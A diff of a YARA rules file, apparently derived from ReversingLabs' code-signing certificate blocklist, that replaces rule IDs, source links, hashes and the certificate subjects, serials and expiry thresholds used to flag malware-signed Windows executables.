 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5a4abffb-ac0d-5e70-8193-0cd1a83377ac"
+		id = "f48b7818-5b34-5609-822a-39a2e7fb44c5"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10534-L10550"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0ba1155b30761f48674aaa82a70a06fea30cced6518f089f3f9f173a4eb06a09"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3434-L3450"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d347bce3eddd0cac276a7504955f0342ae44fd93d238e514af5b1fdc208b68fc"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13615,21 +38280,21 @@ rule REVERSINGLABS_Cert_Blocklist_5226A724Cfa0B4Bc0164Ecda3F02A3Dc : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VALENTE SP Z O O" and pe.signatures [ i ] . serial == "52:26:a7:24:cf:a0:b4:bc:01:64:ec:da:3f:02:a3:dc" and 1647302400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ISECURE GROUP PTY LTD" and pe.signatures [ i ] . serial == "23:f5:37:ce:13:c6:cc:cd:fd:3f:8c:e8:1f:b9:81:cb" and 1566086400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0A7Be7722B65A866Ebcd3Bd7F8F10825 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_73Ecfdbb99Aec176Ddfcf7958D120E1A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2b177573-8b9f-538f-8d07-b7baede1148d"
+		id = "84e20878-e4ea-53a5-9c1b-04f3c66276de"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10552-L10568"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c4aa22241ef72d454db4ec0fb0933abfa7b1d8d1029b45410475832cda4a2af4"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3452-L3468"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d911156707cef97acf79c096b5d4a4db166ddf05237168f1ecffb0c0a2ebd8fa"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13639,21 +38304,21 @@ rule REVERSINGLABS_Cert_Blocklist_0A7Be7722B65A866Ebcd3Bd7F8F10825 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rebound Infotech Limited" and pe.signatures [ i ] . serial == "0a:7b:e7:72:2b:65:a8:66:eb:cd:3b:d7:f8:f1:08:25" and 1637971200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MHOW PTY LTD" and pe.signatures [ i ] . serial == "73:ec:fd:bb:99:ae:c1:76:dd:fc:f7:95:8d:12:0e:1a" and 1566864000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_05634456Dbedb3556Ca8415E64815C5D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_675129Bb174A5B05E330Cc09F8Bbd70A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c9a05c35-2aed-5944-aad7-65ae2c290c6c"
+		id = "97046206-efc4-58dd-a9df-4966bad3902d"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10570-L10586"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f5941c74821c0cd76633393d0346a9de2c7bccc666dc20b34c5b4d733faefc8f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3470-L3486"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d989ea5233e8a64bffa0e29645c3458ef1f5173158ced7814c3b473b92ef49f4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13663,21 +38328,21 @@ rule REVERSINGLABS_Cert_Blocklist_05634456Dbedb3556Ca8415E64815C5D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Walden Intertech Inc." and pe.signatures [ i ] . serial == "05:63:44:56:db:ed:b3:55:6c:a8:41:5e:64:81:5c:5d" and 1648425600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALEX & CO PTY LIMITED" and pe.signatures [ i ] . serial == "67:51:29:bb:17:4a:5b:05:e3:30:cc:09:f8:bb:d7:0a" and 1565568000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2E07A8D6E3B25Ae010C8Ed2C4Ab0Fb37 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_De13Fe2Dbb8F890287E1780Aff6Ffd22 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "39d23cbf-862f-5a3d-9e30-b3f0929963d5"
+		id = "d2b15920-76ae-54e4-988c-278a3622ec52"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10588-L10604"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "bad2144c9cde02a75fa968e3c24178f3ba73b0addb2b4967f24733b933e0eeb6"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3488-L3504"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ebd983bcfa1e5d54af9d9e07d80d05f4752040eab92e63cd986db789fa07026f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13687,21 +38352,21 @@ rule REVERSINGLABS_Cert_Blocklist_2E07A8D6E3B25Ae010C8Ed2C4Ab0Fb37 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Emurasoft, Inc." and pe.signatures [ i ] . serial == "2e:07:a8:d6:e3:b2:5a:e0:10:c8:ed:2c:4a:b0:fb:37" and 1650499200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LAST TIME PTY LTD" and pe.signatures [ i ] . serial == "de:13:fe:2d:bb:8f:89:02:87:e1:78:0a:ff:6f:fd:22" and 1566259200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_30B4Eeebd88Fd205Acc8577Bbaed8655 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Da000D18949C247D4Ddfc2585Cc8Bd0F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "27c60ade-41e1-5ba4-be8d-275edc01b5ba"
+		id = "3e939b73-abe4-5941-93ab-18bcde854aaf"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10606-L10622"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "673ec5a1cacb9a7be101a4a533baf5a1eab4e6dd8721c69e56636701c5303c72"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3506-L3524"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3453f13e633a2c233f78d0389c655bb5304e567407b3e0c5c47e5e7127c345ca"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13711,21 +38376,21 @@ rule REVERSINGLABS_Cert_Blocklist_30B4Eeebd88Fd205Acc8577Bbaed8655 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Enforcer Srl" and pe.signatures [ i ] . serial == "30:b4:ee:eb:d8:8f:d2:05:ac:c8:57:7b:ba:ed:86:55" and 1646179200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PORT-SERVIS LTD" and ( pe.signatures [ i ] . serial == "00:da:00:0d:18:94:9c:24:7d:4d:df:c2:58:5c:c8:bd:0f" or pe.signatures [ i ] . serial == "da:00:0d:18:94:9c:24:7d:4d:df:c2:58:5c:c8:bd:0f" ) and 1564444800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_B3391A6C1B3C6836533959E2384Ab4Ca : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_06E842D3Ea6249D783D6B55E29C060C7 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ab274ae3-0884-517a-a221-2c952fc9d74c"
+		id = "37829f07-c569-5e46-8b7a-2137c4c801e8"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10624-L10642"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "38e38acfbfbf63b7179d2f8656f70224afa9269a7bdecd10ccbbbd92a6a216d3"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3526-L3542"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "9f71de0119527c8580f9e47e3fba07242814c5a537d727d4541fd7a802b0cb86"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13735,21 +38400,21 @@ rule REVERSINGLABS_Cert_Blocklist_B3391A6C1B3C6836533959E2384Ab4Ca : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VERIFIED SOFTWARE LLC" and ( pe.signatures [ i ] . serial == "00:b3:39:1a:6c:1b:3c:68:36:53:39:59:e2:38:4a:b4:ca" or pe.signatures [ i ] . serial == "b3:39:1a:6c:1b:3c:68:36:53:39:59:e2:38:4a:b4:ca" ) and 1595462400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PORT-SERVIS LTD, TOV" and pe.signatures [ i ] . serial == "06:e8:42:d3:ea:62:49:d7:83:d6:b5:5e:29:c0:60:c7" and 1565568000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_05D50A0E09Bb9A836Ffb90A3 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_06473C3C19D9E1A9429B58B6Faec2967 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f2e0959f-3bc6-5552-8f7a-f84672fb597d"
+		id = "01eba681-8c98-5553-b369-941b6dba11e2"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10644-L10660"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1bd1960cd6dd8bf83472dc2b1809b84ceb3db68a5e6c3ba68f28ad922230b2ed"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3544-L3560"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f9ca49ce65d213dce803806956c0ce1da0c4068bea173daae9cb06dab0a86268"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13759,21 +38424,21 @@ rule REVERSINGLABS_Cert_Blocklist_05D50A0E09Bb9A836Ffb90A3 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Toliz Info Tech Solutions INC." and pe.signatures [ i ] . serial == "05:d5:0a:0e:09:bb:9a:83:6f:fb:90:a3" and 1643892810 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Digital Leadership Solutions Limited" and pe.signatures [ i ] . serial == "06:47:3c:3c:19:d9:e1:a9:42:9b:58:b6:fa:ec:29:67" and 1581984001 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0A2787Fbb4627C91611573E323584113 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_39F56251Df2088223Cc03494084E6081 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "64848927-6a60-5ea9-bae5-7d15c3f35ca6"
+		id = "0c475e89-9729-53b9-a301-7a9faa0fef91"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10662-L10678"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "efa352beafb56b95a89554bc8929f8e01a4da46eef1f6cf8a1487a2a06bc1b3e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3562-L3578"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c87850f91758a5bb3bdf6f6d7de9a3f53077d64cebdde541ac0742d3cea4f4e0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13783,21 +38448,21 @@ rule REVERSINGLABS_Cert_Blocklist_0A2787Fbb4627C91611573E323584113 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "exxon.com" and pe.signatures [ i ] . serial == "0a:27:87:fb:b4:62:7c:91:61:15:73:e3:23:58:41:13" and 1640822400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Inter Med Pty. Ltd." and pe.signatures [ i ] . serial == "39:f5:62:51:df:20:88:22:3c:c0:34:94:08:4e:60:81" and 1583539200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1D36C4F439D651503589318F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1362E56D34Dc7B501E17Fa1Ac3C3E3D9 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f72b8e2c-b799-5aec-a69a-e42cdb3e2ae1"
+		id = "9dccd009-eca1-5f21-b5ef-1a75f9d93c7d"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10680-L10696"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "73dc3c01041d50100a8d5519afe1a80f470c30175f9ad1bf76ac287ac199a959"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3580-L3596"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0415c5a49076bab23dfc29ef2d6168b93d6bfde07a89ccb0368d2c967422407a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13807,21 +38472,21 @@ rule REVERSINGLABS_Cert_Blocklist_1D36C4F439D651503589318F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REDWOOD MARKETING SOLUTIONS INC." and pe.signatures [ i ] . serial == "1d:36:c4:f4:39:d6:51:50:35:89:31:8f" and 1651518469 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO  \"Amaranth\"" and pe.signatures [ i ] . serial == "13:62:e5:6d:34:dc:7b:50:1e:17:fa:1a:c3:c3:e3:d9" and 1575936000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_26F855A25890B749578F13E4B9459768 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4B83593Fc78D92Cfaa9Bdf3F97383964 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d873b0d4-dff5-5ee2-a70f-b067602b217e"
+		id = "8b5a8a8e-16f5-5098-83e5-72820f4f548a"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10698-L10714"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "35bfa39ef8f03d10af884f288278ea6ad3aff31cbae111057c2b619c6dc0a752"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3598-L3614"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "775e41fc102cbaeb9374984380b0e073de2a0075b9a200f8ab644bd1369ba015"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13831,21 +38496,21 @@ rule REVERSINGLABS_Cert_Blocklist_26F855A25890B749578F13E4B9459768 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Boo\\xE2\\x80\\x99s Q & Sweets Corporation" and pe.signatures [ i ] . serial == "26:f8:55:a2:58:90:b7:49:57:8f:13:e4:b9:45:97:68" and 1645401600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Kometa" and pe.signatures [ i ] . serial == "4b:83:59:3f:c7:8d:92:cf:aa:9b:df:3f:97:38:39:64" and 1579996800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0F1Ae2239Bb96C5Aef49D0Ae50266912 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_C7505E7464E00Ec1Dccd8D1B466D15Ff : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "44c878ab-75b2-5cd3-a019-94982a508e0f"
+		id = "a75cc09f-de73-5db4-9ace-189e8da99053"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10716-L10732"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4f88df4fc2f4cd89aa177ce09caab3e2660267ae883f7ab54c22a9ba1657bad0"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3616-L3634"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7c5c84cb9071eff6a1bd7062506b807466bb4a432d1ed073961898c6c08cc4bd"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13855,21 +38520,21 @@ rule REVERSINGLABS_Cert_Blocklist_0F1Ae2239Bb96C5Aef49D0Ae50266912 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aarav Consulting Inc." and pe.signatures [ i ] . serial == "0f:1a:e2:23:9b:b9:6c:5a:ef:49:d0:ae:50:26:69:12" and 1653004800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ltd. \"Eve Beauty\"" and ( pe.signatures [ i ] . serial == "00:c7:50:5e:74:64:e0:0e:c1:dc:cd:8d:1b:46:6d:15:ff" or pe.signatures [ i ] . serial == "c7:50:5e:74:64:e0:0e:c1:dc:cd:8d:1b:46:6d:15:ff" ) and 1583824676 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1Deea179F5757Fe529043577762419Df : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Cbf91988Fb83511De1B3A7A520712E9C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ef29c813-e914-5766-990f-76c14d18ec79"
+		id = "d2d71058-f7b9-594f-b099-75aa4774306f"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10734-L10750"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "67c3d3496caf54ca0b1afc4d1dcc902e2f3632ac6708f85e163d427b567d098f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3636-L3654"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5862a8ec43d2e545f36b815ada2bb31c4384a8161c6956a31f3bd517532923fd"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13879,21 +38544,21 @@ rule REVERSINGLABS_Cert_Blocklist_1Deea179F5757Fe529043577762419Df : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SPIRIT CONSULTING s. r. o." and pe.signatures [ i ] . serial == "1d:ee:a1:79:f5:75:7f:e5:29:04:35:77:76:24:19:df" and 1645401600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ltd. \"Eve Beauty\"" and ( pe.signatures [ i ] . serial == "00:cb:f9:19:88:fb:83:51:1d:e1:b3:a7:a5:20:71:2e:9c" or pe.signatures [ i ] . serial == "cb:f9:19:88:fb:83:51:1d:e1:b3:a7:a5:20:71:2e:9c" ) and 1578786662 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5B1F9Ec88D185631Ab032Dbfd5166C0D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ce3675Ae4Abfe688870Bcacb63060F4F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "51c596cd-3033-51ef-914f-310d2bbfbd5f"
+		id = "586c9de9-e1b0-5d17-9783-c9e18dfdf463"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10752-L10768"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "dec9d43c6911deb5f35c45692bfd6ef47f85d955f5e59041e58a1f0d2fc306e3"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3656-L3674"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0c6f2ef55bef283a3f915fd8c1ced27c3c665f7f490caeea0f180c2d7fa2b2b5"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13903,21 +38568,21 @@ rule REVERSINGLABS_Cert_Blocklist_5B1F9Ec88D185631Ab032Dbfd5166C0D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TOPFLIGHT GROUP LIMITED" and pe.signatures [ i ] . serial == "5b:1f:9e:c8:8d:18:56:31:ab:03:2d:bf:d5:16:6c:0d" and 1656028800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO \"MPS\"" and ( pe.signatures [ i ] . serial == "00:ce:36:75:ae:4a:bf:e6:88:87:0b:ca:cb:63:06:0f:4f" or pe.signatures [ i ] . serial == "ce:36:75:ae:4a:bf:e6:88:87:0b:ca:cb:63:06:0f:4f" ) and 1582675200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_58Af00Ce542760Fc116B41Fa92E18589 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_9813229Efe0046D23542Cc7569D5A403 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "bb58ae8d-ef28-5644-abe8-2d4d8c892e95"
